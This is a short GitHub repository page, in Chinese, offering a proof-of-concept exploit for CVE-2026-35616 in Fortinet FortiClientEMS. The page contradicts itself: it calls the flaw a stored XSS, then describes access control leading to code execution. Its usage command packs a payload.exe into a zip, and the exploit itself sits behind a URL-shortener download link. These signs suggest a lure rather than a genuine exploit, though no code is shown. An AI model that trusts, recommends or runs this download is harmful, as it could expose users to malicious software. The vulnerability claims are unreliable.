jenniferreire26/CVE-2026-35616
GitHub: jenniferreire26/CVE-2026-35616
该项目是针对 Fortinet FortiClientEMS 未授权存储型 XSS 漏洞(CVE-2026-35616)的 PoC 利用脚本,用于验证该危急漏洞的可利用性。
Stars: 0 | Forks: 0
# CVE-2026-35616 - Fortinet FortiClientEMS 7.4.5 未授权存储型跨站脚本攻击
## 快速使用
```
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## 利用说明
- **严重程度:** 危急
- **CVSS:** 9.8
- **影响:** 机密性、完整性、可用性
- **发布日期:** 2026-04-04
## 技术概述
Fortinet FortiClientEMS 7.4.5 至 7.4.6 中存在不当访问控制漏洞,可能允许未授权攻击者通过构造的请求执行未经授权的代码或命令。
## 受影响版本
**Fortinet Forticlientems:**
- 7.4.5
- 7.4.6
## 参考信息
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-35616
## 利用
[下载 PoC](https://tinyurl.com/255fbm7z)
标签:CVE, Python, 威胁模拟, 数字签名, 无后门, 自动化分析, 跨站脚本, 逆向工具